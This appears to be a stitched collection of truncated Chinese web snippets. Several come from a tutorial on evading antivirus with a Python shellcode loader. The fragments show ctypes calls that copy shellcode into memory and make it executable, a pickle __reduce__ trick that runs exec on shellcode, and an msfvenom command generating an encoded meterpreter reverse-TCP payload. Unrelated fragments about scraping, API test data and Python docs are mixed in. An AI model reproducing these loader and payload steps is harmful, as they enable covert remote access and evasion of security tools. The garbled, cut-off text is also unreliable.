buffered=(ctypes.c_char*len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buffered,ctypes.c_int(len(shellcode)))# 这里开始更改它的属性为可执行 ctypes.windll.kernel32.VirtualProtect(ptr,len(shellcode),0x40,ctypes.byref(ctypes.c_long(1)))# 创建...
(shellcode,))#当实例对象被pickle后,则会调用特殊方法__reduce__,所以下列代码相当于pickle.dumps((exec,(shellcode,)))ret = pickle.dumps(A())print(ret)#输出:b'\x80\x04\x95-\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x04exec\x94\x93\x94\x8c\x11list1 = [1,2,3,4...
这里就直接实战过免杀的整个过程,主要的思路就是shellcode和loader编码混淆,把python转成exe可执行文件。 1、生成shellcode
1、第一个shellcode加载器 import ctypes # msf生成的shellcode,命令:msfvenom -e x64/xor_dynamic -i 16 -p windows/x64/meterpreter_reverse_tcp lhost=192.168.111.111 lp
appId:xxx,appSecret:xxx,productId:xxx,accessId:xxx,idCode:xxx,mobile:xxx,name:xxx 一、读取测试数据,对数据进行必要的处理 首先我们需要先读取文件,去除首尾空格,然后切割中间“,”得到list,并做对于请求异常做处理。 代码语言:javascript 代码运行次数:0 ...
本文分为几个部分:1、shellcode加载器实现;2、代码混淆;3、寻找免杀api4、分离免杀,分离加载器与shellcode;5、python打包成exe6、组合,免杀效果分析0x01 shellcode加载器实现第一个shellcode加载器大部分脚本语言加载Shellcode都是通过c的ffi去调用操...
Python 安装器会自动地把 .py 文件和 python.exe关联起来,因此双击 Python 分拣将会把它当成一个脚本运行。文件扩展名也可以是 .pyw,在这种情况下,运行时不出现控制台窗口。 - 15.1.3. 交互式启动文件¶ + 16.1.3. 交互文件¶ 当你使用交互式Python的时候,它常常很方便地执行命令在每次解释器...
# 读取js代码文件f=open('壁纸.js','r',encoding='utf-8').read()# 编译js文件内容js_code=execjs.compile(f)# 调用js代码函数 --> 函数名传入字符串data=js_code.call('_0xc7dd1',result)# json字符串数据转成json字典数据info=json.loads(data)# 解析数据, 提取图片IDforindexininfo['list']:...
code = f.read() ctx = execjs.compile(code) c = "N('{}','{}')".format(pl,aes) data = json.loads(ctx.eval(c)) for i in data: print(i['mp3']) 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. luowang.js文件: var N = function(a, b, c) { ...
import pickle # 实现导入模组 with open(r"C:\Users\Administrator\Desktop\Python工程\序列化,反序列化\123.txt","wb") as A: name = "小明" nenrei = 16 yuanzu = [1,2,3] pickle.dump(name,A) # pickle.dimp(对象名 ,路径) 写入 pickle.dump(nenrei,A) pickle.dump(yuanzu,A) ###以下读...